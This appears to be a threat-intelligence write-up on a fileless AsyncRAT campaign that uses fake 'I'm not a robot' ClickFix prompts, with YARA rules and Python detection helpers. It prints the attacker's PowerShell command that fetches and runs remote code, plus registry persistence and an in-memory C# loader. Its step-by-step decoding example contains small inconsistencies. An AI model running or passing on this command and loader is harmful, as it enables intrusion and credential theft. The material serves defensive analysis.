A fileless AsyncRAT campaign is targeting German-speaking users via a fake “I’m not a robot” prompt that executes malicious PowerShell code. Delivered through Clickfix-themed sites, it abuses system utilities to load obfuscated C# code in memory, enabling full remote access and credential theft. It persists via registry keys and communicates with a C2 server on port 4444. Organizations should block suspicious PowerShell activity and scan memory for threats.
A fileless AsyncRAT joins the Clickfix party with an obfuscated, PowerShell-based campaign. The malware is delivered via a fake verification prompt that lures users into executing a malicious command. Based on the language used in the verification prompt, we can ascertain with high confidence that the campaign targets German-speaking users. The chain abuses legitimate system utilities and in-memory C# loaders with reversed strings to evade detection. Once executed, the malware establishes persistence through registry keys and connects to a remote TCP C2 server on port 4444. It enables full remote control, credential theft, and data exfiltration, all without dropping files to disk. Mitigations include blocking suspicious PowerShell execution, monitoring registry activity, and scanning memory for in-memory payloads commonly used in LOLBins-based delivery methods.
During a routine attacker-infrastructure discovery and attribution cycle, we discovered a Clickfix-themed delivery website.
When the victim clicks “I’m not a robot”, a command is copied to the clipboard and instructions are displayed for the victim to follow.
```powershell
conhost.exe --headless powershell -w hidden -nop -c $x =
[System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI
'http://namoet[.]de:80/x').Content); cmd /c $x" Drücke enter um deine identität zu bestätigen!
```
The string “Drücke enter um deine identität zu bestätigen!” within the command translates to "Press enter to confirm your identity!". This suggests that the Clickfix delivery page is designed to target German-speaking users.
```powershell
powershell -w hidden -nop -c
$x = [System.Text.Encoding]::UTF8.GetString((Invoke-webrequest -URI 'http://namoet[.]de:80/x').Content)
```
The command assumes the downloaded content is UTF-8-encoded text and decodes it into a string.
*The contents of the downloaded payload “x” can be found in the Appendix.
```powershell
cmd /c $x
```
```powershell
$c = 'conhost.exe --headless powershell -nop -w hidden -c '+[char]34+$MyInvocation.MyCommand+[char]34;
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' 'windows' ...
Set-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' 'win' $c;
```
```powershell
$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk=';
$d = $f.Substring(3,16).ToCharArray();
[array]::reverse($d);
$y = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));
$g = '<obfuscated and reversed C# code>';
$l = $g.ToCharArray();
[array]::reverse($l);
Add-Type -TypeDefinition $($l -join '');
```
*The contents of “$l” can be found in the Appendix.
```powershell
[B]::ma($y.Trim())
```
```powershell
$f='ask='+'=gClRmL'+'0V2b'+'tFm'+'blk=';
$d=$f.Substring(3,16).ToCharArray();
[array]::reverse($d);
$y=[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($d -join ''));
```
Breaking this down:
```text
$f = 'ask=' + '=gClRmL' + '0V2b' + 'tFm' + 'blk='
   = 'ask==gClRmL0V2btFmblk='
$f.Substring(3,16)
   = '=gClRmL0V2btFmbl'
# Before reverse: '=gClRmL0V2btFmbl'
# After reverse:  'lbmFtbt2V0LmRlLg='
Base64 string: 'lbmFtbt2V0LmRlLg='
Decoded:       'namoet[.]de:4444'
```
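The same Substring, reverse and Base64 steps as a reusable decoder, written as an added example (not CloudSEK's tooling). The sample string `SAMPLE_F` is constructed in the loader's shape and decodes to the placeholder `c2.test:4444`, not to the campaign's real C2; the `build_like_loader` helper exists only to construct such samples.

```python
import base64

# Constructed sample in the same shape as the campaign's $f: three junk
# characters, then 16 characters of reversed base64, then trailing junk.
# It is NOT the campaign's string; it decodes to the placeholder "c2.test:4444".
SAMPLE_F = 'ask0' + 'QDN0oDd' + 'zVGd' + 'uIz' + 'Ylk='
DEFAULT_PORT = 4444  # the C2 port reported for this campaign


def build_like_loader(plaintext, prefix='ask', suffix='lk='):
    """Produce a string in the loader's shape (only used to construct samples)."""
    return prefix + base64.b64encode(plaintext.encode('latin-1')).decode()[::-1] + suffix


def decode_reversed_b64(blob, offset=3, length=16):
    """Mirror the loader: Substring(offset, length) -> reverse -> FromBase64String -> Trim.

    PowerShell's [Encoding]::Default is the ANSI code page; latin-1 is a
    byte-for-byte stand-in that never raises on unexpected bytes.
    """
    b64 = blob[offset:offset + length][::-1]
    b64 += '=' * (-len(b64) % 4)  # re-pad in case the slice dropped trailing '='
    return base64.b64decode(b64).decode('latin-1').strip()


def split_c2(endpoint, default_port=DEFAULT_PORT):
    """'host:port' -> (host, port); the port falls back to 4444 when absent."""
    host, sep, port = endpoint.rpartition(':')
    return (host, int(port)) if sep and port.isdigit() else (endpoint, default_port)


if __name__ == '__main__':
    c2 = decode_reversed_b64(SAMPLE_F)
    print(c2, split_c2(c2))
```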
On certain exit codes, it kills itself with GetCurrentProcess().Kill().
In our sample:
```powershell
conhost.exe --headless powershell -w hidden -nop -c ...
```
This execution pattern is frequently observed in AsyncRAT delivery.
The payload contains:
```powershell
Add-Type -TypeDefinition $($l -join '')
[B]::ma($y.Trim())
```
The .NET code contains:
```csharp
TcpClient b = new TcpClient(); b.Connect(d, e);
...
while (true) { c.Read(...) ...}
```
This is indicative of a long-running backchannel, which is characteristic of AsyncRAT's C2 logic.
The malware sets persistence using:
```powershell
Set-ItemProperty 'HKCU:\...RunOnce' ...
```
AsyncRAT variants often use HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce or Run for user-level persistence without triggering UAC.
As noted above, the Clickfix delivery page copied a command with the text “Drücke enter um deine identität zu bestätigen!” appended to it. Using that text in the copied command as a pivot point, we discovered additional attacker-controlled infrastructure that was used in the same campaign for Clickfix delivery and C2 operations.
Based on the additional infrastructure discovered, we can ascertain with medium confidence that this campaign has been running since at least April 2025.
```yara
rule AsyncRAT_Memory_Resident_Reversed_Loader
{
    meta:
        author = "CloudSEK Cyber Threat Intelligence"
        description = "Detects AsyncRAT C# loader code in memory, focusing on reversed strings and reflective loading behavior"
        malware_family = "AsyncRAT"
        date = "2025-06-12"
        scope = "memory"

    strings:
        // Reversed .NET namespaces indicating obfuscation
        $s1 = "gnidaerhT.metsyS gnisu" ascii
        $s2 = "txeT.metsyS gnisu" ascii
        $s3 = "stekcoS.teN.metsyS gnisu" ascii
        $s4 = "scitsongaiD.metsyS gnisu" ascii

        // Add-Type used at runtime
        $s5 = "Add-Type -TypeDefinition" ascii

        // TcpClient logic reversed (in-memory string form)
        $s6 = "tneilCpcT wen = b tneilCpcT cilbup" ascii
        $s7 = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii

        // Function signatures reversed
        $s8 = "diov citats cilbup" ascii
        $s9 = "ssalc cilbup" ascii

        // Registry persistence reversed (optional)
        $s10 = "'nosiW' = yek'1UR\\...'KUH" wide ascii nocase

    condition:
        5 of ($s*)
}
```
```yara
rule AsyncRAT_PowerShell_ReversedLoader
{
    meta:
        author = "CloudSEK Cyber Threat Intelligence"
        description = "Detects AsyncRAT payloads using PowerShell with reversed base64-encoded C# and Add-Type loader"
        malware_family = "AsyncRAT"
        date = "2025-06-12"

    strings:
        // PowerShell pattern using common obfuscation flags
        $ps_flags = "powershell -nop -w hidden -c" ascii

        // Use of Add-Type to compile C# code at runtime
        $add_type = "Add-Type -TypeDefinition" ascii

        // Registry persistence keys
        $reg1 = "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" ascii
        $reg2 = "HKCU:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows" ascii

        // Reversed C# namespace common to AsyncRAT
        $rev_using = "gnidaerhT.metsyS gnisu" ascii
        $rev_dns = ")]0[w(gnirtSteG.tluafeD.gnidocnE = emaNeliF" ascii

        // TcpClient and Connect() reversed calls in .NET
        $tcp_client = "tneilCpcT wen = b tneilCpcT cilbup" ascii
        $connect_call = ")(f;)(maertSteG.b = c;)e ,d(tcennoC.b" ascii

        // Common TCP port used (4444) for C2
        $port_4444 = "4444" ascii

    condition:
        all of ($ps_flags, $add_type, $reg1, $rev_using, $tcp_client) and
        any of ($reg2, $rev_dns, $port_4444, $connect_call)
}
```
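The reversed-string heuristic behind the rules above, applied at script level as an added example (not CloudSEK's tooling): instead of hard-coding reversed literals, the plain C# markers are reversed at runtime and every long single-quoted PowerShell literal is un-reversed and checked against them, alongside the Add-Type loader and registry-key indicators from this post. The marker lists are the author's own choice, and `SAMPLE` is a constructed stage-2 look-alike whose C# body is a short stand-in.

```python
import re

# Plain-text C# markers; reversing them at runtime keeps the list readable.
CSHARP_MARKERS = [
    'using System.Net.Sockets', 'using System.Threading', 'using System.Text',
    'using System.Diagnostics', 'public class', 'public static void',
    'new TcpClient', '.Connect(', '.GetStream(',
]
LOADER_MARKERS = ['Add-Type -TypeDefinition', '[array]::reverse', 'FromBase64String']
PERSISTENCE_KEYS = [r'CurrentVersion\RunOnce', r'Windows NT\CurrentVersion\Windows']


def reversed_csharp_hits(text, min_len=64):
    """Reverse every long single-quoted literal and list the C# markers it contains."""
    hits = {}
    for lit in re.findall(r"'([^']{%d,})'" % min_len, text):
        found = [m for m in CSHARP_MARKERS if m in lit[::-1]]
        if found:
            hits[lit[:24] + '...'] = found   # key: preview of the still-reversed literal
    return hits


def triage(script):
    """Combine loader, persistence and reversed-C# evidence into one verdict."""
    loader = [m for m in LOADER_MARKERS if m in script]
    persist = [k for k in PERSISTENCE_KEYS if k in script]
    rev = reversed_csharp_hits(script)
    n_csharp = sum(len(v) for v in rev.values())
    # Verdict threshold is the author's choice: runtime compilation of a literal
    # that turns into C# once reversed (>= 3 markers) is the core of this loader.
    suspicious = 'Add-Type -TypeDefinition' in loader and n_csharp >= 3
    return {'loader': loader, 'persistence': persist,
            'reversed_csharp': rev, 'suspicious': suspicious}


# Constructed sample in the shape of the stage-2 script in this post; the C#
# body is a short stand-in, reversed here exactly as the loader would store it.
CSHARP = ('using System;using System.Net.Sockets;using System.Threading;'
          'public class B{public static void ma(string a){var b=new TcpClient();}}')
SAMPLE = (
    "Set-ItemProperty 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce' 'windows' $c;\n"
    "$g = '" + CSHARP[::-1] + "';\n"
    "$l = $g.ToCharArray(); [array]::reverse($l);\n"
    "Add-Type -TypeDefinition $($l -join '');\n"
)
BENIGN = "Get-ChildItem 'C:\\Users' | Where-Object { $_.Name -like 'a*' }\n"

if __name__ == '__main__':
    print(triage(SAMPLE))
```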